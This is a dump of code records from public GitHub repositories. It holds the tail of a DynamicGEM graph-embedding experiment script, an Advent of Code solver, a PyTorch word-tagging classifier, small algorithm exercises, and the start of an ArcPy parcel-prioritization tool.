dynamic_sbm_series[-4:])\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Learns static node embeddings')\n parser.add_argument('-t', '--testDataType',\n default='sbm_cd',\n type=str,\n help='Type of data to test the code')\n parser.add_argument('-nm', '--nodemigration',\n default=10,\n type=int,\n help='number of nodes to migrate')\n parser.add_argument('-iter', '--niters',\n type=int,\n help=\"number of optimization iterations\",\n default=20)\n parser.add_argument('-m', '--starttime',\n type=str,\n help=argparse.SUPPRESS,\n default=0)\n parser.add_argument('-d', '--datafile',\n type=str,\n help='input directory name')\n parser.add_argument('-b', '--batchsize',\n type=int,\n help=\"batchsize for training\",\n default=1000)\n parser.add_argument('-n', '--nsteps',\n type=int,\n help=\"number of time steps\",\n default=10)\n parser.add_argument('-K', '--embdim',\n type=int,\n help=\"number of embedding dimensions\",\n default=128)\n parser.add_argument('-l', '--stepsize',\n type=int,\n help=\"size of of a time steps\",\n default=1)\n parser.add_argument('-s', '--stepstride',\n type=int,\n help=\"interval between two time steps\",\n default=1)\n parser.add_argument('-o', '--outdir',\n type=str,\n default='./output',\n help=\"output directory name\")\n parser.add_argument('-rd', '--resultdir',\n type=str,\n default='./results_link_all',\n help=\"result directory name\")\n parser.add_argument('--lr',\n type=float,\n help=\"initial learning rate\",\n default=0.1)\n parser.add_argument('--beta-smooth',\n type=float,\n default=0.1,\n help=\"coefficients for smooth component\")\n parser.add_argument('--beta-triad',\n type=float,\n default=0.1,\n help=\"coefficients for triad component\")\n parser.add_argument('--negdup',\n type=int,\n help=\"neg/pos ratio during sampling\",\n default=1)\n parser.add_argument('--datasetmod',\n type=str,\n default='core.dataset.adjlist',\n help='module name for dataset loading',\n )\n parser.add_argument('--validation',\n type=str,\n default='link_reconstruction',\n help=', '.join(list(sorted(set(du.TestSampler.tasks) & set(eu.Validator.tasks)))))\n parser.add_argument('-te', '--test',\n type=str,\n nargs='+',\n default='link_predict',\n help='type of test, (node_classify, node_predict, link_classify, link_predict, '\n 'changed_link_classify, changed_link_predict, all)')\n parser.add_argument('--classifier',\n type=str,\n default='lr',\n help='lr, svm')\n parser.add_argument('--repeat',\n type=int,\n default=1,\n help='number of times to repeat experiment')\n parser.add_argument('-sm', '--samples',\n default=5000,\n type=int,\n help='samples for test data')\n args = parser.parse_args()\n args.embdir = args.outdir + '/dynTriad/' + args.testDataType\n args.cachefn = '/tmp/' + args.testDataType\n args.beta = [args.beta_smooth, args.beta_triad]\n # some fixed arguments in published code\n args.pretrain_size = args.nsteps\n args.trainmod = 'dynamictriad.core.algorithm.dynamic_triad'\n args.sampling_args = {}\n args.debug = False\n args.scale = 1\n\n if args.validation not in du.TestSampler.tasks:\n raise NotImplementedError(\"Validation task {} not supported in TestSampler\".format(args.validation))\n if args.validation not in eu.Validator.tasks:\n raise NotImplementedError(\"Validation task {} not supported in Validator\".format(args.validation))\n\n print(\"running with options: \", args.__dict__)\n\n epochs = args.niters\n length = args.nsteps\n\n if args.testDataType == 'sbm_cd':\n node_num = 1000\n community_num = 2\n node_change_num = args.nodemigration\n dynamic_sbm_series = dynamic_SBM_graph.get_community_diminish_series_v2(node_num,\n community_num,\n length,\n 1,\n node_change_num)\n graphs = [g[0] for g in dynamic_sbm_series]\n\n datafile = dataprep_util.prep_input_dynTriad(graphs, length, args.testDataType)\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=args.batchsize,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=node_num )\n\n embedding.learn_embedding()\n embedding.get_embedding()\n # embedding.plotresults(dynamic_sbm_series)\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + 'dynTRIAD'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n lp.expstaticLP_TRIAD(dynamic_sbm_series,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'nm' + str(args.nodemigration) + '_l' + str(args.nsteps) + '_emb' + str(args.embdim),\n )\n\n\n elif args.testDataType == 'academic':\n print(\"datatype:\", args.testDataType)\n\n sample = args.samples\n if not os.path.exists('./test_data/academic/pickle'):\n os.mkdir('./test_data/academic/pickle')\n graphs, length = dataprep_util.get_graph_academic('./test_data/academic/adjlist')\n for i in range(length):\n nx.write_gpickle(graphs[i], './test_data/academic/pickle/' + str(i))\n else:\n length = len(os.listdir('./test_data/academic/pickle'))\n graphs = []\n for i in range(length):\n graphs.append(nx.read_gpickle('./test_data/academic/pickle/' + str(i)))\n\n G_cen = nx.degree_centrality(graphs[29]) # graph 29 in academia has highest number of edges\n G_cen = sorted(G_cen.items(), key=operator.itemgetter(1), reverse=True)\n node_l = []\n i = 0\n while i < sample:\n node_l.append(G_cen[i][0])\n i += 1\n # pdb.set_trace()\n # node_l = np.random.choice(range(graphs[29].number_of_nodes()), 5000, replace=False)\n # print(node_l)\n for i in range(length):\n graphs[i] = graph_util.sample_graph_nodes(graphs[i], node_l)\n # pdb.set_trace()\n graphs = graphs[-args.nsteps:]\n datafile = dataprep_util.prep_input_dynTriad(graphs, args.nsteps, args.testDataType)\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=args.batchsize,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=sample\n\n )\n embedding.learn_embedding()\n embedding.get_embedding()\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n outdir = outdir + '/dynTriad'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n lp.expstaticLP_TRIAD(None,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'l' + str(args.nsteps) + '_emb' + str(args.embdim) + '_samples' + str(sample),\n n_sample_nodes=sample\n )\n\n\n elif args.testDataType == 'hep':\n print(\"datatype:\", args.testDataType)\n\n if not os.path.exists('./test_data/hep/pickle'):\n os.mkdir('./test_data/hep/pickle')\n files = [file for file in os.listdir('./test_data/hep/hep-th') if '.gpickle' in file]\n length = len(files)\n graphs = []\n for i in range(length):\n G = nx.read_gpickle('./test_data/hep/hep-th/month_' + str(i + 1) + '_graph.gpickle')\n\n graphs.append(G)\n total_nodes = graphs[-1].number_of_nodes()\n\n for i in range(length):\n for j in range(total_nodes):\n if j not in graphs[i].nodes():\n graphs[i].add_node(j)\n\n for i in range(length):\n nx.write_gpickle(graphs[i], './test_data/hep/pickle/' + str(i))\n else:\n length = len(os.listdir('./test_data/hep/pickle'))\n graphs = []\n for i in range(length):\n graphs.append(nx.read_gpickle('./test_data/hep/pickle/' + str(i)))\n\n # pdb.set_trace() \n sample = args.samples\n G_cen = nx.degree_centrality(graphs[-1]) # graph 29 in academia has highest number of edges\n G_cen = sorted(G_cen.items(), key=operator.itemgetter(1), reverse=True)\n node_l = []\n i = 0\n while i < sample:\n node_l.append(G_cen[i][0])\n i += 1\n for i in range(length):\n graphs[i] = graph_util.sample_graph_nodes(graphs[i], node_l)\n\n graphs = graphs[-args.nsteps:]\n datafile = dataprep_util.prep_input_dynTriad(graphs, args.nsteps, args.testDataType)\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=args.batchsize,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=sample\n\n )\n embedding.learn_embedding()\n embedding.get_embedding()\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n outdir = outdir + '/dynTriad'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n lp.expstaticLP_TRIAD(None,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'l' + str(args.nsteps) + '_emb' + str(args.embdim) + '_samples' + str(sample),\n n_sample_nodes=sample\n )\n\n\n elif args.testDataType == 'AS':\n print(\"datatype:\", args.testDataType)\n\n files = [file for file in os.listdir('./test_data/AS/as-733') if '.gpickle' in file]\n length = len(files)\n graphs = []\n\n for i in range(length):\n G = nx.read_gpickle('./test_data/AS/as-733/month_' + str(i + 1) + '_graph.gpickle')\n graphs.append(G)\n\n sample = args.samples\n G_cen = nx.degree_centrality(graphs[-1]) # graph 29 in academia has highest number of edges\n G_cen = sorted(G_cen.items(), key=operator.itemgetter(1), reverse=True)\n node_l = []\n i = 0\n while i < sample:\n node_l.append(G_cen[i][0])\n i += 1\n for i in range(length):\n graphs[i] = graph_util.sample_graph_nodes(graphs[i], node_l)\n\n graphs = graphs[-args.nsteps:]\n datafile = dataprep_util.prep_input_dynTriad(graphs, args.nsteps, args.testDataType)\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=args.batchsize,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=sample\n\n )\n\n embedding.learn_embedding()\n embedding.get_embedding()\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n outdir = outdir + '/dynTriad'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n lp.expstaticLP_TRIAD(None,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'l' + str(args.nsteps) + '_emb' + str(args.embdim) + '_samples' + str(sample),\n n_sample_nodes=sample\n )\n\n elif args.testDataType == 'enron':\n print(\"datatype:\", args.testDataType)\n\n files = [file for file in os.listdir('./test_data/enron') if 'month' in file]\n length = len(files)\n graphsall = []\n\n for i in range(length):\n G = nx.read_gpickle('./test_data/enron/month_' + str(i + 1) + '_graph.gpickle')\n graphsall.append(G)\n\n sample = graphsall[0].number_of_nodes()\n graphs = graphsall[-args.nsteps:]\n datafile = dataprep_util.prep_input_dynTriad(graphs, args.nsteps, args.testDataType)\n # pdb.set_trace()\n\n embedding = dynamicTriad(niters=args.niters,\n starttime=args.starttime,\n datafile=datafile,\n batchsize=100,\n nsteps=args.nsteps,\n embdim=args.embdim,\n stepsize=args.stepsize,\n stepstride=args.stepstride,\n outdir=args.outdir,\n cachefn=args.cachefn,\n lr=args.lr,\n beta=args.beta,\n negdup=args.negdup,\n datasetmod=args.datasetmod,\n trainmod=args.trainmod,\n pretrain_size=args.pretrain_size,\n sampling_args=args.sampling_args,\n validation=args.validation,\n datatype=args.testDataType,\n scale=args.scale,\n classifier=args.classifier,\n debug=args.debug,\n test=args.test,\n repeat=args.repeat,\n resultdir=args.resultdir,\n testDataType=args.testDataType,\n clname='lr',\n node_num=sample\n\n )\n\n embedding.learn_embedding()\n embedding.get_embedding()\n\n outdir = args.resultdir\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/' + args.testDataType\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n outdir = outdir + '/dynTriad'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n\n lp.expstaticLP_TRIAD(None,\n graphs,\n embedding,\n 1,\n outdir + '/',\n 'l' + str(args.nsteps) + '_emb' + str(args.embdim) + '_samples' + str(sample),\n n_sample_nodes=sample\n )\n","repo_name":"palash1992/DynamicGEM","sub_path":"dynamicgem/embedding/dynamicTriad.py","file_name":"dynamicTriad.py","file_ext":"py","file_size_in_byte":39541,"program_lang":"python","lang":"en","doc_type":"code","stars":335,"dataset":"github-code","pt":"61"} +{"seq_id":"18484931145","text":"import os\nimport sys\nimport copy\n\npuzzle_input_path = os.path.join(os.path.dirname(__file__), \"input_1.txt\")\n\nwith open(puzzle_input_path) as puzzle_input_file:\n puzzle_input_raw = puzzle_input_file.read()\n\n# parse the boot code\nboot_code = [x.split() for x in puzzle_input_raw.splitlines()]\n\n\ndef run(boot_code):\n accumulator = 0\n visited = set()\n current_idx = 0\n\n while current_idx not in visited and current_idx < len(boot_code):\n instruction = boot_code[current_idx]\n visited.add(current_idx)\n if instruction[0] == \"acc\":\n accumulator += int(instruction[1])\n current_idx += 1\n elif instruction[0] == \"jmp\":\n current_idx += int(instruction[1])\n else:\n current_idx += 1\n\n return current_idx not in visited, accumulator\n\n\n# brute force the shit\nfor idx, instruction in enumerate(boot_code):\n copied_boot_code = copy.deepcopy(boot_code)\n if instruction[0] == \"nop\":\n copied_boot_code[idx][0] = \"jmp\"\n elif instruction[0] == \"jmp\":\n copied_boot_code[idx][0] = \"nop\"\n else:\n continue\n\n is_terminated, accumulator = run(copied_boot_code)\n if is_terminated:\n print(f\"Boot Code terminated with changed {instruction[0]} to {copied_boot_code[idx][0]} at {idx} - Accumulator is: {accumulator}\")\n break","repo_name":"timofurrer/aoc","sub_path":"2020/08/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15140610164","text":"from torch import Tensor\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport numpy as np\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\nX_train = open('src-train.txt').read().split('\\n')\nX_test = open('src-test.txt').read().split('\\n')\ny_train = open('tgt-train.txt').read().split('\\n')\ny_test = open('tgt-test.txt').read().split('\\n')\n\ntokens = set([])\nfor sentence in X_train+X_test:\n for word in sentence.split(' '):\n tokens.add(word)\ntokens = list(tokens)\ntokens.append('')\ntokens.append('')\nnum_tokens = len(tokens)\nprint(num_tokens)\n\ntag_list = set([])\nfor sentence in y_train+y_test:\n for tag in sentence.split(' '):\n tag_list.add(tag)\ntag_list = list(tag_list)\nnum_tags = len(tag_list)\nprint(num_tags) \n \ndef get_one_hot(word):\n one_hot = torch.zeros(num_tokens)\n one_hot[tokens.index(word)] = 1\n return one_hot\n\ndef get_tag(tag):\n return tag_list.index(tag)\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(num_tokens, 1000)\n self.fc2 = nn.Linear(3 * num_tags, num_tags)\n self.fc3 = nn.Linear(1000,num_tags)\n \n def forward(self,x,x_1,x_2):\n x = Variable(x.T)\n x = self.fc1(x)\n x = F.relu(x)\n x = F.relu(self.fc3(x))\n \n x_1 = Variable(x_1.T)\n x_1 = self.fc1(x_1)\n x_1 = F.relu(x_1)\n x_1 = F.relu(self.fc3(x_1))\n \n x_2 = Variable(x_2.T)\n x_2 = self.fc1(x_2)\n x_2 = F.relu(x_2)\n x_2 = F.relu(self.fc3(x_2))\n \n x_com = torch.cat((x, x_1, x_2), 0)\n final = F.softmax(self.fc2(x_com))\n return final\n \nnet = Net()\nnet = net.float()\nnet.to(device)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(net.parameters())\n\nfor epoch in range(10):\n running_loss = 0.0\n for i in range(len(X_train)):\n# try:\n print(i, end=\" \")\n optimizer.zero_grad()\n words = X_train[i].split(' ')\n words.append('')\n words.insert(0,'')\n tags = y_train[i].split(' ')\n a = []\n for j in range(1,len(words)-1):\n x = get_one_hot(words[j]).to(device)\n x_1 = get_one_hot(words[j+1]).to(device)\n x_2 = get_one_hot(words[j-1]).to(device)\n a.append(net(x,x_1,x_2))\n out = torch.stack(a)\n out.to(device)\n b = [get_tag(tag) for tag in tags]\n res = torch.tensor(b)\n res = res.cuda()\n loss = torch.tensor(0)\n loss.to(device)\n loss = criterion(out,res)\n loss.to(device)\n\n print(running_loss)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n# except:\n# continue\nprint('Finished Training')\n\ndef predict_tag(probs):\n values, indices = torch.max(probs,0)\n return tag_list[indices]\n\nf = open('out.txt','w')\nwith torch.no_grad():\n for i in range(len(X_test)):\n words = X_test[i].split(' ')\n words.append('')\n words.insert(0,'')\n tags = y_test[i].split(' ')\n a = []\n for j in range(1,len(words)-1):\n x = get_one_hot(words[j]).to(device)\n x_1 = get_one_hot(words[j+1]).to(device)\n x_2 = get_one_hot(words[j-1]).to(device)\n a.append(net(x,x_1,x_2)) \n for j in range(len(a)):\n f.write(predict_tag(a[j])+\" \")\n f.write(\"\\n\")\nf.close()\n\nout = open('out.txt').read().split('\\n')\nerror = 0\ntotal = 0\nfor i in range(len(y_test)):\n print(i)\n out_tags = out[i].split(' ')\n target_tags = y_test[i].split(' ')\n for j in range(len(target_tags)):\n print(out_tags[j],target_tags[j])\n if(out_tags[j]!=target_tags[j]):\n error+=1\n total+=1\nprint(error)\nprint(total)\nprint((total-error)/total)","repo_name":"abhigyanghosh30/6th-Semester","sub_path":"Linguistics Data 2/Assignment4/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6937401369","text":"class TreeStore:\n def __init__(self, items):\n self.items = items\n\n @property\n def getAll(self):\n return self.items\n\n def getItem(self, id):\n for item in items:\n if item[\"id\"] == id:\n return item\n\n def getChildren(self, parent):\n new_items = []\n for item in self.items:\n if item[\"parent\"] == parent:\n new_items.append(item)\n return new_items\n\n def getAllParents(self, child):\n new_items1 = []\n\n def getParent(parent, new_items2):\n for item_ in new_items2:\n if item_[\"id\"] == parent:\n new_items1.append(item_)\n getParent(item_[\"parent\"], new_items2)\n break\n\n for item in self.items:\n if item[\"id\"] == child:\n getParent(item[\"parent\"], self.items)\n return new_items1\n\n\nitems = [\n {\"id\": 1, \"parent\": \"root\"},\n {\"id\": 2, \"parent\": 1, \"type\": \"test\"},\n {\"id\": 3, \"parent\": 1, \"type\": \"test\"},\n {\"id\": 4, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 5, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 6, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 7, \"parent\": 4, \"type\": None},\n {\"id\": 8, \"parent\": 4, \"type\": None},\n]\nts = TreeStore(items)\n\nif __name__ == \"__main__\":\n print(ts.getAll)\n print(ts.getItem(7))\n print(ts.getChildren(4))\n print(ts.getChildren(5))\n print(ts.getAllParents(7))\n","repo_name":"Stanis96/test_for_status","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70576694915","text":"# O(n) time | O(1) space\n\nclass Solution:\n @staticmethod\n def canCompleteCircuit(gas: List[int], cost: List[int]) -> int:\n if sum(gas) < sum(cost):\n return -1\n \n total = 0\n res = 0\n\n for i in range(len(gas)):\n total += (gas[i] - cost[i])\n\n if total < 0:\n total = 0\n res = i + 1\n \n return res\n\ngas = [1,2,3,4,5]\ncost = [3,4,5,1,2]\nassert Solution.canCompleteCircuit(gas, cost) == 3\n","repo_name":"akashsonowal/ml-foundations","sub_path":"ml_foundations/ops_utils/coding_toolkit/data_structures_and_algorithms/greedy/gas_station.py","file_name":"gas_station.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7077819238","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\nName: Parcel Prioritization Tool\r\nPurpose: Given a shapefile of parcels and an input table of criteria, \r\n weights, and ranks, this toolbox will calculate a prioritization \r\n score of each parcel, rank the parcels by score, and generate a \r\n rank-sorted parcel table.\r\n \r\nCreated on Thu Dec 27 09:14:07 2018\r\n\r\n@author: cspence\r\n\"\"\"\r\n\r\n# set environments, etc\r\n\r\nimport arcpy\r\nfrom arcpy import env\r\nimport xlrd\r\nimport numpy as np\r\nfrom numpy.lib.recfunctions import rec_append_fields\r\nimport os\r\n\r\nmxd = arcpy.mapping.MapDocument(\"CURRENT\")\r\n\r\nworkspace = arcpy.GetParameterAsText(0)\r\nworkspace = 'K:\\\\DataServices\\\\Projects\\\\Current_Projects\\\\Environment\\\\Neponset\\\\IDDE_Task_FY19\\BMP_Prioritization\\\\Data\\\\Spatial\\\\ParcelDB_creation.gdb'\r\narcpy.env.workspace = workspace\r\n\r\n# Assemble layers\r\nparcels = arcpy.GetParameterAsText(1) # This is the \"MA Land Parcel Database:\r\n # Stormwater Edition\" created by running\r\n # the load_calc, nutrientmuni_pctile, and \r\n # parcel_combine\r\n#parcels = 'K:\\\\DataServices\\\\Projects\\\\Current_Projects\\\\Environment\\\\Neponset\\\\IDDE_Task_FY19\\BMP_Prioritization\\\\Data\\\\Spatial\\\\ParcelDB_creation.gdb\\\\Parcels_withnutrientpctiles'\r\n \r\ntable = arcpy.GetParameterAsText(2) # This table includes categorizations,\r\n # weights, and ranks of each criterion\r\n#table = 'K:\\\\DataServices\\\\Projects\\\\Current_Projects\\\\Environment\\\\Neponset\\\\IDDE_Task_FY19\\BMP_Prioritization\\\\Data\\\\Tabular\\\\entry_template_TN_20200_04_30.xlsx'\r\n \r\ntheme = arcpy.GetParameterAsText(3) # Short (ideally < 3 character) descriptive \r\n # string identifying priority theme\r\n#theme = 'TN'\r\n \r\n\r\n\r\n \r\n'''\r\nDefine useful functions\r\n'''\r\n\r\ndef AutoName(table): \r\n # function that automatically names a feature class or raster\r\n # Adapted from MAPC's stormwater toolkit script at https://github.com/MAPC/stormwater-toolkit/blob/master/Burn_Raster_Script.py\r\n \r\n checktable = arcpy.Exists(table) # checks to see if the raster already exists\r\n count = 2\r\n newname = table\r\n\r\n while checktable == True: # if the raster already exists, adds a suffix to the end and checks again\r\n newname = table + str(count)\r\n count += 1\r\n checktable = arcpy.Exists(newname)\r\n\r\n return newname\r\n\r\ndef unique_values(table, field):\r\n # Function from http://geospatialtraining.com/get-a-list-of-unique-attribute-values-using-arcpy/\r\n with arcpy.da.SearchCursor(table, [field]) as cursor:\r\n return sorted({row[0] for row in cursor})\r\n\r\n \r\ndef join_table_shapefile(table, tablefield, shapefile, shapefield, outputname):\r\n # Function to join a table to a shapefile, resulting in a hard-copy shapefile with attributes from the table\r\n \r\n # Join luloadtable to bmpparcels to get code from 3-12\r\n shape_layer = AutoName(shapefile + '_table')\r\n arcpy.MakeFeatureLayer_management(shapefile, shape_layer, workspace = workspace)\r\n \r\n # Add a join from the pollutant-relevant land use type to parcel database\r\n temp_join = arcpy.AddJoin_management(shape_layer, shapefield, table, tablefield, 'KEEP_ALL')\r\n arcpy.CopyFeatures_management(temp_join, outputname)\r\n\r\n return(outputname)\r\n \r\ndef calc_catscr(parcels, fieldname, cattype, threshs, weights):\r\n \r\n# print(fieldname)\r\n \r\n def findindex(table, fieldname):\r\n ''' Function from https://gis.stackexchange.com/questions/101540/finding-the-index-of-a-field-with-its-name-using-arcpy\r\n to find the index of a table's fields from the field name '''\r\n return [i.name for i in arcpy.ListFields(table)].index(fieldname)\r\n\r\n num_groups = len(threshs)\r\n threshs = [str(t) for t in threshs]\r\n \r\n # Add a new field for the categorization score\r\n scrname = fieldname + '_scr'\r\n arcpy.AddField_management(parcels, scrname, 'DOUBLE')\r\n \r\n # Go through and calculate new value based on original score and table cats\r\n fields = [fieldname, scrname]\r\n with arcpy.da.UpdateCursor(parcels, fields) as cursor:\r\n for row in cursor:\r\n if cattype == 'categorical':\r\n threshs = [str(t) for t in threshs]\r\n if num_groups >= 2:\r\n if row[0] == threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] == threshs[1]:\r\n row[1] = weights[1]\r\n \r\n if num_groups > 2:\r\n if row[0] == threshs[2]:\r\n row[1] = weights[2]\r\n else:\r\n pass\r\n \r\n if num_groups > 3:\r\n if row[0] == threshs[3]:\r\n row[1] = weights[3]\r\n else:\r\n pass\r\n \r\n if num_groups > 4:\r\n if row[0] == threshs[4]:\r\n row[1] = weights[4]\r\n else:\r\n pass\r\n \r\n if num_groups > 5:\r\n if row[0] == threshs[5]:\r\n row[1] = weights[5]\r\n else:\r\n pass\r\n \r\n if num_groups > 6:\r\n if row[0] == threshs[6]:\r\n row[1] = weights[6]\r\n else:\r\n pass\r\n \r\n if num_groups > 7:\r\n if row[0] == threshs[7]:\r\n row[1] = weights[7]\r\n else:\r\n pass\r\n \r\n if num_groups > 8:\r\n if row[0] == threshs[8]:\r\n row[1] = weights[8]\r\n else:\r\n pass\r\n else: # Pair: if 8\r\n pass\r\n else: # Pair: if 7\r\n pass\r\n else: # Pair: if 6\r\n pass \r\n else: # Pair: if 5\r\n pass\r\n else: # Pair: if 4\r\n pass\r\n else: # Pair: if 3\r\n pass\r\n else: # Pair: if 2\r\n pass\r\n else:\r\n arcpy.AddMessage('ERROR: Criterion must have at least two categories')\r\n \r\n elif cattype == 'numeric':\r\n threshs = [float(t) for t in threshs]\r\n if num_groups == 2:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n# print(weights[0])\r\n else:\r\n row[1] = weights[1]\r\n# print(weights[1])\r\n elif num_groups == 3:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n else:\r\n row[1] = weights[2]\r\n elif num_groups == 4:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n else:\r\n row[1] = weights[3]\r\n elif num_groups == 5:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n elif row[0] > threshs[3]:\r\n row[1] = weights[3]\r\n else:\r\n row[1] = weights[4]\r\n elif num_groups == 6:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n elif row[0] > threshs[3]:\r\n row[1] = weights[3]\r\n elif row[0] > threshs[4]:\r\n row[1] = weights[4]\r\n else:\r\n row[1] = weights[5]\r\n elif num_groups == 7:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n elif row[0] > threshs[3]:\r\n row[1] = weights[3]\r\n elif row[0] > threshs[4]:\r\n row[1] = weights[4]\r\n elif row[0] > threshs[5]:\r\n row[1] = weights[5]\r\n else:\r\n row[1] = weights[6]\r\n elif num_groups == 8:\r\n if row[0] > threshs[0]:\r\n row[1] = weights[0]\r\n elif row[0] > threshs[1]:\r\n row[1] = weights[1]\r\n elif row[0] > threshs[2]:\r\n row[1] = weights[2]\r\n elif row[0] > threshs[3]:\r\n row[1] = weights[3]\r\n elif row[0] > threshs[4]:\r\n row[1] = weights[4]\r\n elif row[0] > threshs[5]:\r\n row[1] = weights[5]\r\n elif row[0] > threshs[6]:\r\n row[1] = weights[6]\r\n else:\r\n row[1] = weights[7]\r\n else:\r\n arcpy.AddMessage('ERROR: Number of thresholds is not an integer between 1 and 8')\r\n \r\n elif cattype == 'binary':\r\n threshs = [str(t) for t in threshs]\r\n if row[0] is None or row[0] == ' ' or row[0] == 0:\r\n row[1] = weights[0]\r\n else:\r\n row[1] = weights[1]\r\n else:\r\n arcpy.AddMessage('ERROR: Category type (cattype) not recognized. Type must be \"binary\", \"categorical\", or \"numeric.\" Check for typos or capitalization errors.')\r\n cursor.updateRow(row)\r\n \r\n return(scrname)\r\n \r\ndef prioritize_parcels(parcels, fieldnames, scrnames, field_weight, soilind):\r\n ''' Updates \"parcels\".'''\r\n 